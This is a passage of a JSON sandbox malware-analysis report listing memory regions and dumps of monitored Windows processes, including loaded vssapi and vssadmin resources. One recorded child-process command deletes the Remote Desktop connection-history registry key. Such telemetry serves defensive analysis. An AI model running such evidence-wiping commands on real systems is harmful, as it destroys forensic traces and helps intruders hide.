"ref_process_dump": { "ref_id": "proc_dump_797", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_1247", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:08:10.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1936785408, "type": "region", "version": 1 }, "end_va": 1937162239, "entry_point": 1937045400, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1248", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1936785408, "timestamp": "00:08:10.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1937178624, "type": "region", "version": 1 }, "end_va": 1937436671, "entry_point": 1937366648, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1249", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1937178624, "timestamp": "00:08:10.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1937506304, "type": "region", "version": 1 }, "end_va": 1937539071, "entry_point": 1937514744, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1250", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1937506304, "timestamp": "00:08:10.781", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001251-addr_0x0000000076dc0000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_798", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1994129408, "type": "region", "version": 1 }, "end_va": 1995153407, "entry_point": 0, "filename": null, "id": "region_1251", "name": "private_0x0000000076dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994129408, "timestamp": "00:08:10.782", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001252-addr_0x0000000076ec0000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_799", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1995177984, "type": "region", "version": 1 }, "end_va": 1996353535, "entry_point": 0, "filename": null, "id": "region_1252", "name": "private_0x0000000076ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995177984, "timestamp": "00:08:10.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1253", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:08:10.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1254", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:08:10.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1255", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:08:10.857", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001256-addr_0x0000000000290000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_800", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_1256", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:08:10.857", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001257-addr_0x0000000000750000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_801", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 8716287, "entry_point": 0, "filename": null, "id": "region_1257", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:08:10.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1138688, "start_va": 1954152448, "type": "region", "version": 1 }, "end_va": 1955291135, "entry_point": 1954152448, "filename": "\\Windows\\SysWOW64\\vssapi.dll", "id": "region_1258", "name": "vssapi.dll", "norm_filename": "c:\\windows\\syswow64\\vssapi.dll", "region_type": "memory_mapped_file", "start_va": 1954152448, "timestamp": "00:08:10.859", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958608895, "entry_point": 1958543360, "filename": "\\Windows\\SysWOW64\\vsstrace.dll", "id": "region_1259", "name": "vsstrace.dll", "norm_filename": "c:\\windows\\syswow64\\vsstrace.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:08:10.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1958608896, "type": "region", "version": 1 }, "end_va": 1958690815, "entry_point": 1958616489, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_1260", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1958608896, "timestamp": "00:08:10.880", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1959854080, "type": "region", "version": 1 }, "end_va": 1959903231, "entry_point": 1959858401, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1261", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1959854080, "timestamp": "00:08:10.882", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1959919616, "type": "region", "version": 1 }, "end_va": 1960312831, "entry_point": 1960027059, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1262", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1959919616, "timestamp": "00:08:10.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1960706048, "type": "region", "version": 1 }, "end_va": 1961291775, "entry_point": 1960722353, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1263", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1960706048, "timestamp": "00:08:10.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1964244992, "type": "region", "version": 1 }, "end_va": 1965359103, "entry_point": 1964323539, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1264", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1964244992, "timestamp": "00:08:10.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1966407679, "entry_point": 1965471469, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1265", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:08:10.891", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1967456255, "entry_point": 1966885349, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1266", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:08:10.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968099327, "entry_point": 1967669207, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1267", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:08:10.898", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968152575, "entry_point": 1968125600, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1268", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:08:10.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968177152, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1968219250, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1269", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968177152, "timestamp": "00:08:10.902", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1971257344, "type": "region", "version": 1 }, "end_va": 1972240383, "entry_point": 1971324265, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1270", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1971257344, "timestamp": "00:08:10.904", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1972240384, "type": "region", "version": 1 }, "end_va": 1972342783, "entry_point": 1972259189, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1271", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1972240384, "timestamp": "00:08:10.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1972371456, "type": "region", "version": 1 }, "end_va": 1972658175, "entry_point": 1972401272, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1272", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972371456, "timestamp": "00:08:10.908", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1972699136, "type": "region", "version": 1 }, "end_va": 1974124543, "entry_point": 1973008957, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1273", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1972699136, "timestamp": "00:08:10.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1974140928, "type": "region", "version": 1 }, "end_va": 1974730751, "entry_point": 1974231875, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1274", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1974140928, "timestamp": "00:08:10.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1275", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:08:10.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1276", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:08:10.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 7372799, "entry_point": 0, "filename": null, "id": "region_1277", "name": "pagefile_0x0000000000580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5767168, "timestamp": "00:08:10.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966800895, "entry_point": 1966478735, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1278", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:08:10.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1971175423, "entry_point": 1970345611, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1279", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:08:10.922", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1280", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:08:10.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_1281", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:08:10.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 53248, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1036287, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui", "id": "region_1282", "name": "vssadmin.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:08:10.968", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001283-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_802", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_1283", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:08:10.977", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001284-addr_0x0000000000190000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_803", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1642495, "entry_point": 0, "filename": null, "id": "region_1284", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:08:10.977", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001285-addr_0x00000000001a0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_804", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_1285", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:08:10.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_1286", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:08:10.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001287-addr_0x00000000002a0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_805", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_1287", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:08:10.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8716288, "type": "region", "version": 1 }, "end_va": 10293247, "entry_point": 0, "filename": null, "id": "region_1288", "name": "pagefile_0x0000000000850000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8716288, "timestamp": "00:08:10.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10354688, "type": "region", "version": 1 }, "end_va": 31326207, "entry_point": 0, "filename": null, "id": "region_1289", "name": "pagefile_0x00000000009e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10354688, "timestamp": "00:08:10.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1977352192, "type": "region", "version": 1 }, "end_va": 1977888767, "entry_point": 1977352192, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_1290", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1977352192, "timestamp": "00:08:10.980", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001291-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_806", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1291", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:08:10.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_1292", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:08:10.995", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001293-addr_0x0000000000300000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_807", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1293", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:08:10.995", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001294-addr_0x0000000000400000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_808", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_1294", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:08:10.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958412288, "type": "region", "version": 1 }, "end_va": 1958502399, "entry_point": 1958424003, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1295", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958412288, "timestamp": "00:08:10.997", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001296-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_809", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_1296", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:08:10.998", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1953890304, "type": "region", "version": 1 }, "end_va": 1954131967, "entry_point": 1953895053, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1297", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1953890304, "timestamp": "00:08:11.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 31326208, "type": "region", "version": 1 }, "end_va": 34271231, "entry_point": 31326208, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1298", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 31326208, "timestamp": "00:08:11.154", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1953882111, "entry_point": 1953824768, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_1299", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:08:11.158", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f", "filename": "c:\\windows\\syswow64\\reg.exe", "id": "proc_7", "image_name": "reg.exe", "monitor_reason": "child_process", "monitored_id": 7, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000007-region_00001300-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_810", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1300", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:08:11.245", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001301-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_811", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1301", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:08:11.245", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, 